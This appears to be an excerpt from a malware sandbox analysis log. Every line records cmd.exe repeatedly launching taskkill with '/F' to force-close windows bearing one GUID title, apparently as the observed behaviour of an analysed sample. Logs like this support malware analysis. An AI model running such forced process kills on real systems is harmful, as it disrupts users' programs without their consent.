Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
